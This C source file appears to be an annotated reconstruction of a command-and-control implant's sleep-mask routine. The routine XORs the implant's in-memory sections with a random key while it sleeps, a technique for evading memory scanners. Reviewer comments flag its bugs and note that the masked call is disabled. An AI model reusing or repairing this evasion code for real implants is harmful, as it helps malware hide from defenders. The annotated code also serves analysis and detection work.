#include "BeaconSleep.h"
// Parameter block handed to the sleep-mask routine. It is allocated and filled
// once in sub_1000436C(); nothing visible in this file frees it.
SLEEPMASKP* gBeaconSleepMask;
/**
 * Returns the module base recorded in Beacon_Dllbase.
 *
 * The value is read from a variable declared outside this file and is
 * returned unchanged.
 */
HINSTANCE GetBeaconBase()
{
    HINSTANCE moduleBase = Beacon_Dllbase;
    return moduleBase;
}
// Address of the relocated copy of BeaconSleepMask. NULL until sub_1000436C()
// has run; that function also uses it as its "already initialised" flag.
PVOID SleepEncryptlpAddress;
/*
 * One-time setup for the sleep-mask path. The body runs only while
 * SleepEncryptlpAddress is still NULL.
 *
 * What the visible code does:
 *   1. Copies the machine code of BeaconSleepMask to GetBeaconBase() + get_dword(41).
 *   2. Allocates gBeaconSleepMask and fills in the module base, the section
 *      table returned by get_str(42) and 13 random mask bytes.
 *
 * NOTE(review): setting 41 is used here as a byte offset into the module and
 * setting 42 as a list of int pairs; their exact meaning is defined outside
 * this file -- confirm against the settings parser.
 * NOTE(review): neither VirtualProtect call nor malloc has its result checked.
 *
 * For analysts: the observable sequence is a protection change to
 * PAGE_READWRITE on a range inside the module's own image, a write into that
 * range, and a restore of the previous protection.
 */
void sub_1000436C()
{
DWORD flOldProtect;
if (!SleepEncryptlpAddress)
{
int BeaconCode = get_dword(41);
char* Beaconbase = (char*)GetBeaconBase();
// The length is the distance between two function addresses. This assumes
// sub_10004325 is emitted directly after BeaconSleepMask, which the language
// does not guarantee. 4 is PAGE_READWRITE.
VirtualProtect(Beaconbase + BeaconCode, (char*)sub_10004325 - (char*)BeaconSleepMask, 4, &flOldProtect);
SleepEncryptlpAddress = Beaconbase + BeaconCode;
memcpy(SleepEncryptlpAddress, BeaconSleepMask, (char*)sub_10004325 - (char*)BeaconSleepMask);
// Put back the protection saved by the first call.
VirtualProtect(SleepEncryptlpAddress, (char*)sub_10004325 - (char*)BeaconSleepMask, flOldProtect, &flOldProtect);
gBeaconSleepMask = (SLEEPMASKP*)malloc(sizeof(SLEEPMASKP));
gBeaconSleepMask->BeaconBase = (char*)GetBeaconBase();
gBeaconSleepMask->sections = (int*)get_str(42);
// 0xD == 13 bytes, matching the "% 13" key index used in BeaconSleepMask.
random_bytesarray((BYTE*)gBeaconSleepMask->mask, 0xDu);
}
}
/*
 * Sleep-mask routine: XORs byte ranges of the module with a 13-byte key, calls
 * the supplied sleep function, then runs a second XOR pass.
 *
 * parms  - module base, key bytes and a table of (start, end) int pairs that
 *          ends with a (0, 0) pair.
 * psleep - function invoked with `time` between the two passes.
 * time   - value passed straight through to psleep.
 *
 * sub_1000436C() copies this function's code to another address, so it is
 * written to depend only on its arguments.
 *
 * NOTE(review): as published, the two passes are not mirror images of each
 * other (see the inline notes), so this listing should not be taken as a
 * faithful reference for the routine it was reconstructed from. BeaconSleep()
 * in this file has the call to it commented out.
 */
void BeaconSleepMask(SLEEPMASKP* parms, pSleep psleep, int time)
{
int* index = parms->sections;
// First pass. NOTE(review): `index` is never advanced in this loop, so the
// same pair is re-read on every iteration; the loop only exits if the first
// pair is (0, 0).
while (true)
{
int a = index[0];
int b = index[1];
if (!a && !b)
{
break;
}
for (; a < b; ++a)
{
parms->BeaconBase[a] ^= parms->mask[a % 13];
}
}
psleep(time);
// Second pass restarts from the beginning of the table.
index = parms->sections;
while (1)
{
int a = index[0];
int b = index[1];
index += 2;
if (!a && !b)
{
break;
}
for (; a < b; ++a)
{
// NOTE(review): the byte at offset b is XORed on every iteration, not the
// byte at offset a as in the first pass.
parms->BeaconBase[b] ^= parms->mask[b % 13];
}
}
}
/*
 * Wrapper that runs the one-time sleep-mask setup in sub_1000436C().
 *
 * The address of this function is also used in sub_1000436C() as the end
 * marker when computing the size of BeaconSleepMask, so it must stay
 * immediately after BeaconSleepMask in the file. Even then, the final layout
 * is up to the compiler and linker.
 */
void sub_10004325()
{
sub_1000436C();
}
/**
 * Sleeps for the given number of milliseconds.
 *
 * The gate below reads setting 41 and the background-thread counter, but in
 * this listing the masked-sleep call is commented out, so every path ends in
 * a plain Sleep(). The module's memory is therefore left unmodified while the
 * thread sleeps.
 *
 * @param dwMilliseconds duration passed to Sleep().
 */
void BeaconSleep(unsigned long dwMilliseconds)
{
    // Original comment (mis-encoded in the source, apparently GBK):
    // "not used unless this is a reflective DLL".
    const bool maskRequested = get_dword(41) && BackgroundThreadsNumber <= 0;

    // Disabled in the source:
    //sub_10004325();
    //((void(__cdecl*)(SLEEPMASKP*, void(__stdcall*)(DWORD), DWORD))SleepEncryptlpAddress)(gBeaconSleepMask, Sleep, dwMilliseconds);
    (void)maskRequested;

    Sleep(dwMilliseconds);
}